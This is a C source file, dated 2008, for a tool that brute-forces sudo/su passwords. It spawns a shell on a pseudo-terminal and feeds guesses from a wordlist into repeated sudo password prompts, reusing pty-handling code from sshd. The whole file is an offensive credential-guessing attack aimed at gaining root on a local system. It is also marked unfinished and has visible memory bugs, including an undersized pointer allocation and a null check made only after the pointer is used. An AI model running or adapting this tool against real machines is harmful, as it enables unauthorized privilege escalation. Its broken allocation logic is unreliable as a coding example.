/*
 * Sudo/Su Bruteforcer
 * using the pty method
 * by Javantea
 * Sept 1, 2008
 *
 * Description:
 * This program bruteforces sudo/su passwords.
 * From pts manpage:
 * Pseudo-terminals can also be used to send input to programs that normally 
 * refuse to read input from pipes (such as su(8), and passwd(8)).
 *
 * Three of the functions were originally written by other people, they are 
 * labeled. Their copyright can be found below. I am complying fully with their 
 * copyrights.
 *
 * TODO:
 * Finish it.
 *
 */

// Gnu libc guide's explanation of how to do it.
// http://www.linuxtopia.org/online_books/programming_books/gnu_libc_guide/Allocation.html


/*
 * Author: Tatu Ylonen <ylo@cs.hut.fi>
 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
 *                    All rights reserved
 * Allocating a pseudo-terminal, and making it the controlling tty.
 *
 * As far as I am concerned, the code I have written for this software
 * can be used freely for any purpose.  Any derived versions of this
 * software must be clearly marked as such, and if the derived work is
 * incompatible with the protocol description in the RFC file, it must be
 * called by a name other than "ssh" or "Secure Shell".
 */


#define _GNU_SOURCE
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stropts.h>

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <errno.h>

//#include <error.h>
#include <string.h>

#define SHELL "/bin/sh"

#define _PATH_TTY "/dev/tty"

#define debug(a) printf("Debug: %s\n", a)
#define error1 printf

char *__progname = 0;

int open_pty_pair (int *ptyfd, int *ttyfd, char *namebuf, int namebuflen);
void do_exec_pty(int ptyfd, int ttyfd, char *tty);
char **read_password_list(char *filename);

int
main (int argc, char **argv)
{
	__progname = argv[0];
	char tty[256];
	
	int ptyfd, ttyfd;
	if (open_pty_pair(&ptyfd, &ttyfd, tty, sizeof(tty)) == 1)
	{
		printf("Opening %s\n", tty);
		do_exec_pty(ptyfd, ttyfd, tty);
		
	}
	else
	{
		error1("Failed to open pty pair.");
		return 1;
	}
	
	char buf[1025];
	buf[1024] = 0;
	ssize_t r = read(ptyfd, buf, 1024);
	//printf("returned %i bytes: %s\n", r, buf);
	printf("returned %i bytes: \n", r);
	r = write(STDOUT_FILENO, buf, r);
	printf("wrote %i bytes: \n", r);
	char *out1 = "sudo test\n";
	int out1_len = strlen(out1);
	char **password_list = read_password_list("wordlist1.txt");
	if (password_list == 0) {
		error1("woops, read_password_list failed.\n");
		return 1;
	}
	int i = 0;
	while(password_list[i])
	{
		// send sudo test\n
		r = write(ptyfd, out1, out1_len);
		printf("wrote %i bytes: \n", r);
		
		// read sudo test\n
		r = read(ptyfd, buf, 1024);
		printf("returned %i bytes: \n", r);
		write(STDOUT_FILENO, buf, r);
		
		// read Password:
		r = read(ptyfd, buf, 1024);
		printf("returned %i bytes: \n", r);
		write(STDOUT_FILENO, buf, r);
		
		int j;
		for (j = 0; j < 3; j++)
		{
			char *password = password_list[i];
			int password_len = 0;
			while ((password[password_len] != 0) && (password[password_len] != '\n'))
			{
				password_len++;
			}
			password_len++;
			
			r = write(STDOUT_FILENO, password, password_len);
			
			// send password\n
			r = write(ptyfd, password, password_len);
			printf("wrote %i bytes: \n", r);
			
			// read result
			r = read(ptyfd, buf, 1024);
			printf("returned %i bytes: \n", r);
			write(STDOUT_FILENO, buf, r);
			i++;
			// Don't allow us to go past null.
			if (password == 0) break;
		}
		
	}
	r = read(ptyfd, buf, 1024);
	printf("returned %i bytes: \n", r);
	write(STDOUT_FILENO, buf, r);
	sleep(5);
	printf("\n");
	// Free the buffer.
	free(password_list[0]);
	// Free the pointer to the buffer.
	free(password_list);
	
	close(ttyfd);
	close(ptyfd);
	
	return 0;
}

char **read_password_list(char *filename)
{
	FILE *f = fopen(filename, "rb");
	if(f == 0) return 0;
	fseek(f, 0, SEEK_END);
	int size = ftell(f);
	fseek(f, 0, SEEK_SET);
	char *buffer = (char *)malloc(size);
	int read_size = fread(buffer, 1, size, f);
	fclose(f);
	if (read_size != size)
	{
		error1("read_size %i not size %i\n", read_size, size);
		return 0;
	}
	// TODO: Allow more or than 1000 passwords using a loop here counting 
	// newlines.
	int passwords = 1000;
	char **password_list = malloc(passwords);
	char *password = buffer;
	int i = 0;
	while ((password != 0) && (i < passwords))
	{
		password_list[i] = password;
		while ((password[0] != 0) && (password[0] != '\n'))
		{
			password++;
		}
		if(password[0] == '\n')
		{
			password++;
		}
		i++;
	}
	
	return password_list;
}

// Gnu libc guide's explanation of how to do it.
// http://www.linuxtopia.org/online_books/programming_books/gnu_libc_guide/Allocation.html

int
open_pty_pair (int *ptyfd, int *ttyfd, char *namebuf, int namebuflen)
{
	int master, slave;
	char *name;
	
	master = getpt ();
	if (master < 0)
		return 0;
	
	if (grantpt (master) < 0 || unlockpt (master) < 0)
		goto close_master;
	name = ptsname (master);
	if (name == NULL)
		goto close_master;
	
	// null terminator ensured.
	namebuf[namebuflen-1] = 0;
	strncpy(namebuf, name, namebuflen-1);	// possible truncation //
	
	slave = open (name, O_RDWR);
	if (slave == -1)
		goto close_master;
	
	if (isastream (slave))
		{
		if (ioctl (slave, I_PUSH, "ptem") < 0
			|| ioctl (slave, I_PUSH, "ldterm") < 0)
			goto close_slave;
		}
	
	*ptyfd = master;
	*ttyfd = slave;
	return 1;
	
	close_slave:
	close (slave);
	
	close_master:
	close (master);
	return 0;
}


/* Makes the tty the process's controlling tty and sets it to sane modes. */

void
pty_make_controlling_tty(int *ttyfd, const char *tty)
{
	int fd;
#ifdef USE_VHANGUP
	void *old;
#endif /* USE_VHANGUP */

#ifdef _UNICOS
	if (setsid() < 0)
		error1("setsid: %.100s", strerror(errno));

	fd = open(tty, O_RDWR|O_NOCTTY);
	if (fd != -1) {
		signal(SIGHUP, SIG_IGN);
		ioctl(fd, TCVHUP, (char *)NULL);
		signal(SIGHUP, SIG_DFL);
		setpgid(0, 0);
		close(fd);
	} else {
		error1("Failed to disconnect from controlling tty.");
	}

	debug("Setting controlling tty using TCSETCTTY.");
	ioctl(*ttyfd, TCSETCTTY, NULL);
	fd = open("/dev/tty", O_RDWR);
	if (fd < 0)
		error1("%.100s: %.100s", tty, strerror(errno));
	close(*ttyfd);
	*ttyfd = fd;
#else /* _UNICOS */

	/* First disconnect from the old controlling tty. */
#ifdef TIOCNOTTY
	fd = open(_PATH_TTY, O_RDWR | O_NOCTTY);
	if (fd >= 0) {
		(void) ioctl(fd, TIOCNOTTY, NULL);
		close(fd);
	}
#endif /* TIOCNOTTY */
	if (setsid() < 0)
		error1("setsid: %.100s", strerror(errno));

	/*
	 * Verify that we are successfully disconnected from the controlling
	 * tty.
	 */
	fd = open(_PATH_TTY, O_RDWR | O_NOCTTY);
	if (fd >= 0) {
		error1("Failed to disconnect from controlling tty.");
		close(fd);
	}
	/* Make it our controlling tty. */
#ifdef TIOCSCTTY
	debug("Setting controlling tty using TIOCSCTTY.");
	if (ioctl(*ttyfd, TIOCSCTTY, NULL) < 0)
		error1("ioctl(TIOCSCTTY): %.100s", strerror(errno));
#endif /* TIOCSCTTY */
#ifdef NEED_SETPGRP
	if (setpgrp(0,0) < 0)
		error1("SETPGRP %s",strerror(errno));
#endif /* NEED_SETPGRP */
#ifdef USE_VHANGUP
	old = signal(SIGHUP, SIG_IGN);
	vhangup();
	signal(SIGHUP, old);
#endif /* USE_VHANGUP */
	fd = open(tty, O_RDWR);
	if (fd < 0) {
		error1("%.100s: %.100s", tty, strerror(errno));
	} else {
#ifdef USE_VHANGUP
		close(*ttyfd);
		*ttyfd = fd;
#else /* USE_VHANGUP */
		close(fd);
#endif /* USE_VHANGUP */
	}
	/* Verify that we now have a controlling tty. */
	fd = open(_PATH_TTY, O_WRONLY);
	if (fd < 0)
		error1("open /dev/tty failed - could not set controlling tty: %.100s",
		    strerror(errno));
	else
		close(fd);
#endif /* _UNICOS */
}


// from sshd
void do_exec_pty(int ptyfd, int ttyfd, char *tty)
{
	int fdout, ptymaster;
	pid_t pid;
	int is_child = 0;
	
	/* Fork the child. */
	if ((pid = fork()) == 0) {
		is_child = 1;

		/* Child.  Reinitialize the log because the pid has changed. */
		//log_init(__progname, options.log_level, options.log_facility, log_stderr);
		/* Close the master side of the pseudo tty. */
		close(ptyfd);

		/* Make the pseudo tty our controlling tty. */
		pty_make_controlling_tty(&ttyfd, tty);

		/* Redirect stdin/stdout/stderr from the pseudo tty. */
		if (dup2(ttyfd, 0) < 0)
			error1("dup2 stdin: %s", strerror(errno));
		if (dup2(ttyfd, 1) < 0)
			error1("dup2 stdout: %s", strerror(errno));
		if (dup2(ttyfd, 2) < 0)
			error1("dup2 stderr: %s", strerror(errno));

		/* Close the extra descriptor for the pseudo tty. */
		close(ttyfd);

		/*
		// record login, etc. similar to login(1) //
#ifndef HAVE_OSF_SIA
		if (!(options.use_login && command == NULL)) {
#ifdef _UNICOS
			cray_init_job(s->pw); // set up cray jid and tmpdir //
#endif // _UNICOS //
			do_login(s, command);
		}
# ifdef LOGIN_NEEDS_UTMPX
		else
			do_pre_login(s);
# endif
#endif
		*/

		/* Do common processing for the child, such as execing the command. */
		//do_child(s, command);
		char *args[2] = {SHELL, 0};
		execve(SHELL, args, 0);
		/* NOTREACHED */
	}
}
